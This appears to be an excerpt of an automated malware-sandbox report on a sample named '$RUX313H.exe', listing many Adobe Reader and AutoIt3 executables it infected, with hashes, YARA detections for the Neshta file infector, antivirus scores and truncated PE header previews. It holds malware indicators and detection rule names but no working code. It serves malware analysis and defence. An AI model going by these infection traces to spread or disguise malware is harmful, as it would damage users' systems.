                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.355719905315724
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdjrXDyO4zkm8dbHVLokF8iJTwRH0n:sr85CVrMzkm8PL3Eo
                                                                        MD5:A42467B5C21814776277B4CE3456D716
                                                                        SHA1:B01DD2412ADA123EF3D6317F839826D37C6A27D4
                                                                        SHA-256:B1A5063A32CB8AFD591C57AAB1A679137EE29A886AF77849A13C26537A100AD9
                                                                        SHA-512:62D2AECABE4892E0E25A9787A28898EC989A4AA54A66CDB7DE65EB48A8634E0274EB6515722EA1FA580C848E1AD683C75CE26F6AB7D7F7E48A5DD064DD1B3A24
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.228109838185618
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3uireklhKsikOkCWfNU:sr85C+ilU9xL
                                                                        MD5:B9A06C8C07B4BC86001ABCA5835AEED2
                                                                        SHA1:5EA2F32AD6F1642498CDE9F8CA74D8A70DE376E0
                                                                        SHA-256:1531CA6AD23335F3F93231D153CB9DDEE40580A5A82D502AD6F7B54C8328D8B4
                                                                        SHA-512:79C9F72832E53AED9E50C680F0146E6F971D77299E192DD61500E8B91117E19373C7EC92B84A31B2934FD65CD6090E9613BC6F62A2337A1313E7E52A1041B04E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.26326337462311
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFbIJyoI91593nKMd/VHT:sr85CFboI9133K+HT
                                                                        MD5:7C2E8C0527C5CFF276FB2FFA314D455A
                                                                        SHA1:6B6FD014B9C295838E0F1F2D563C185A0004C028
                                                                        SHA-256:41AEBB2A2B6175595684D20DF5F7B8AB8FEB2B5662530F6593287F9F72777296
                                                                        SHA-512:2138731F6006CB6DF13821E05DC16EDEBF7F70777906AB03271707A1237DBFD8859ED43795F36A87901D63BDAA4CC738E46B9D2D0D6361546FD64A2AE56EB65F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.079745714518026
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJCBF45im0N0I9U96lOQ7ABFPXdLtZqWn:JxqjQ+P04wsmJCJ4wNlu9HQIXsW/44
                                                                        MD5:E6A82ED5EA7010F781B63E30C2377BEE
                                                                        SHA1:1829EE1E5E5B34C9721F4EB51E3AD09F7A13DCE2
                                                                        SHA-256:E02365CA739F356FE66B4F49C4D11EC156B0BB512211A177A813FC7D8B0C2DFD
                                                                        SHA-512:2FD5BAF35A018DFF7FCA19A4C118E781FC9D03F9DDED1CEE8F2A5E9E6E41F1C99D984F24E5AB3E60AC2FFBD1B505F728410203D11234197D109BFDEC728ED40D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.352749197508949
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZti/kCXBIvpnJXCFgyf:sr85CzgkC+Jt6gA
                                                                        MD5:E784AF0ED9D53B2A29B2EBBDDE7E470B
                                                                        SHA1:203533AB59D90155BE6EC83B9E7FD643869FBA9D
                                                                        SHA-256:D8B35FBB5A6A4E3069FF8E60BB9F35670DEEB5B5933820CCC4FC9D9D4148EB78
                                                                        SHA-512:A2C77DD2CB33815273C4730892FB45F2EB086853CE7544890FA970F666249FCA61AEDFB826109293066C2F615B95CAE48E9C28F96B0C59D6EA0423B337BDF291
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Au3Check.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.395396839059979
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBBTfrVijfDZaoXFdP+aWYEsPnBEbfOjBvX5zjjSbE51E6AoAV9:sr85CnfrV5EAVMczsELz7Vz
                                                                        MD5:B4E63C549366CFCDA2363E35C197D41C
                                                                        SHA1:10E1078FF8D1FD5FF2080FCB659A012630FD07E8
                                                                        SHA-256:68BE6B2F5E8181E4E36DB6F370E3110C43D702E6953735FE6843D230FA6E7A37
                                                                        SHA-512:FB0B06847F459BA7D439D20608C3A098AA01B18FEBBF3D014536A3CF21353EC0524922056BF151B3A0F66E00E758C36CDC49B44A59C81F78B6249E93B535C893
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Au3Info.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.509452568334581
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCXl/TR5SDQQfzSIOOc1c:sr85CXFR5StHe+
                                                                        MD5:A7D23C329BAABBA8B883C9B0EACCE4A5
                                                                        SHA1:0E2B51FF3DA7806D0F5DCB403222D06637B08738
                                                                        SHA-256:C2521122926A26FFDB7E9D56EE6E24682F1C76B573BEE8765E9E287CB1DCAE89
                                                                        SHA-512:22116FE8362AA86EDBD268EF90A415B4E204416C39AB0312EFFA6E3C2C7C6AB85B000A642443DA071F61E3C370398D6C018E8F4582E9E854BAF2B3BCAB7E5D30
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.476428579556002
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCzbdrFQAj9UlJZ4PAZav4RLRLK:sr85CfQO9UKRGRLK
                                                                        MD5:02879251FEBD3B13DFA84C0DBB3B9387
                                                                        SHA1:D2226312A4460980B036C0CFD3B7BF95752145D9
                                                                        SHA-256:28C72711975DEA1917D0B4C996D93E945F0487DFBDEB1A0B298E9A724F6E8937
                                                                        SHA-512:864BF0149EBBF033306C7B0FBD168D696DFFFEE012B61991C5F0B4D35F82ECE7FE276EBEDE901BF30E22529D8EDEDF3EE3FF64F9D18A411624DB3188ABA45E4E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.520333669037674
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC32EQwB3BsLsWIGihj58u9otwqtOk:sr85C325wztj5xiv
                                                                        MD5:32C22D658E9A54E56C54B1A2AFE1D817
                                                                        SHA1:E1DA8AA26A509BC23A761EB25267DCE9F8A7EF92
                                                                        SHA-256:C957D33A54BD308948E37F020C3FD23DCBE4762DF1143EFAE8109433342DE76C
                                                                        SHA-512:C669F6999EA0ABC48D7AEFB32CD067F37B2894C8EDB1EC538063ED47B719A4597C5BFB770C821DE0D0384FE3B4AC212368B629284D8740E8855D7281A84590C9
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.481287941039048
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrwiuLWf6G/YemcUCYY8AZqQwOp9yQeRoL3:sr85C0iuVAYemcUCN8AwhOpCoL
                                                                        MD5:9C8E99E8AD1568B91CBC2A9FE09304A8
                                                                        SHA1:DCD08E9FE8ACFEF7F194CF0E6759F5468FA028EC
                                                                        SHA-256:A33D6E9432C5D3E83EE5CFEC260EB5C1396982EFC713DA6C5B31F67712272B41
                                                                        SHA-512:68270258389E3EC950F6E1535D2EA7271611A57268B7897E4C76237122DF2B7E15884F4F110C11DFB711BDF42F80F682BC0D81D62E16C954EB7AE0EC43DEF349
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):7.2906774035349695
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCloZCsdndoviDI47IcIyh3e01pxDQOF:sr85C+Z1noWILcIys01vQOF
                                                                        MD5:9B9601BFE0B0E353A4AB8B3FA54F7540
                                                                        SHA1:BFCC868475761DB126FBCE6D36A8F3696C00FD3F
                                                                        SHA-256:289C2D7F33C2ACB203D47A677ABEBC41A6D4D580BFBB3E80A4AD65D35DC65AB8
                                                                        SHA-512:AC65B689940E9CA2A02CFE07F7D53C024B3E612621CCA202DAAE1E37709D66C713C7865C336DBCF8248FC42A55776B3327F9B2AA71C7FAED2F547AFFC4DC15EE
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.586052312714495
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZe5EaY1O/TqX0YpwD3nwBoX0M12Pnhq:JxqjQ+P04wsmJC5QOgVKnwBvPlnJml5
                                                                        MD5:934C8B78754C1FB79DF08EF114600899
                                                                        SHA1:5A50BBC6139CF24D3785A1AC5BC1303087ACCFE6
                                                                        SHA-256:12A68206D1263D798EB284C9A6EF654E4ACFAD20310AFAADB092B54A20358A3A
                                                                        SHA-512:DFF08DAADC807CF170FDC13D4C2EC20D0567B6B4F91D1853F737A6B57ECBBD332EC98D237EF4705E77693361AC3027D0298F194BD10472A2AFF9338616B8C47D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.529393382316189
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC34bCTNhZYt+zphjirUcYkzzaOvo:sr85C3MCR74+/+YcW6o
                                                                        MD5:B6BA74867ECBA5541827551FEEC46F7A
                                                                        SHA1:62AFF9292E306BC442F46D8835CDBA2F777A0BF1
                                                                        SHA-256:8D6A0F83B4FB84B8670BB9C103071B4D40CA433876242B476DB83BDB683FC446
                                                                        SHA-512:850385B0D7ECF20BEC4406D0EFB1AB0A01D9B42E2011FAFC94A8DDB49932FC3B2EB0F6D486903B84D72518928567E96BAE638891F578B9C7CD32C0CEFAC052C4
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.7205787223638
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCA75/gWXq7+8aTaI/dBKvFBvqNm48fnRV2B:sr85CA0a8aTaI/dMrvkL8fnR6
                                                                        MD5:29BAF7AE561A3CCC4EF6A6988D57324D
                                                                        SHA1:B2D3512E166A5F9E10FAA4E461F6EB5A6B926531
                                                                        SHA-256:0B607DF09D9876EC9A80D77B9F2E20267B611A75DA95962FD2DACFF286E00F9F
                                                                        SHA-512:A8CF29B616CF505F8A52E0775F0B3859F29A56181F3E1D5B16B86B40FD4E5BA0ECC5DD81098AC1024A32A1CA4575CD9B7F9F6FB2D22C75F808FE32A124065015
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Uninstall.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.52588514314363
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWCrRRPYqa5pic6jXFdL2KiMceCry:sr85CWCrbPA6jXFN2MceCry
                                                                        MD5:DF57A3FC85CD6B6CFB31C52714E2D79E
                                                                        SHA1:D4DA4DA44C58BB9B818CAF22C7A578FF1EDECF26
                                                                        SHA-256:E660F04725795D12A67A796BA9A96889216C2CAE4A6ADA2459F7948428136BC1
                                                                        SHA-512:14FBDFFF9E7689A2800A150FB3EB7F50E12A25DEBBC7CF18ADADCDAE925A72DE8E942F5A1AC0023D419C965E2DF9684217D13A95A1AD6C1FF2B61D1B2B814F70
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.484749959894503
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmG7XF7ifrIgo8SPntaYEll7AJ:sr85C3F7iMMSVCm
                                                                        MD5:2E784E04B6470C8FDD50399F1ED4FF7E
                                                                        SHA1:4B51ACB85DE25350D6331202884C1F405DF8231F
                                                                        SHA-256:B43C70781E9BA983C9EB256B24E80D998EFB3FEC878FF193C9D11709B89A9040
                                                                        SHA-512:2DDB9B10A7514FC5844FDAF47CB0647F020B4359AAC105415F2A143A336AE194124C903A547FBD8C7FE73B596EBB79F958EA84F867CB326FBF203902B63EA67F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
